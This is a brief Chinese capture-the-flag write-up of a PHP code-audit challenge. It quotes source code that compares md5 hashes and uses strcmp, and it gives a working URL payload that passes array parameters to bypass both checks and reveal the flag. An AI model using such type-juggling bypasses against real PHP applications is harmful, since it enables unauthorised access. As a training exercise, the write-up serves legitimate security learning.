进入后发现首页是一段很伤感的话,做个题都这么伤感,哎。。。。
查看网页源代码,发现code.txt,访问查看,发现是个审计题,代码分析如下:
<?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){ //md5不能用来算数组,这里用数组绕过,v1和v2的值不能一样 if(!strcmp($v3, $flag)){ //strcmp函数的作用是比较两个值是否相等,如果相等返回0,而if是里面的!是非,非0则TURE echo $flag; } } } ?>
于是构造payload:http://123.206.31.85:49162/?v1[]=a&v2[]=b&v3[]=c
得到flag。。。
评论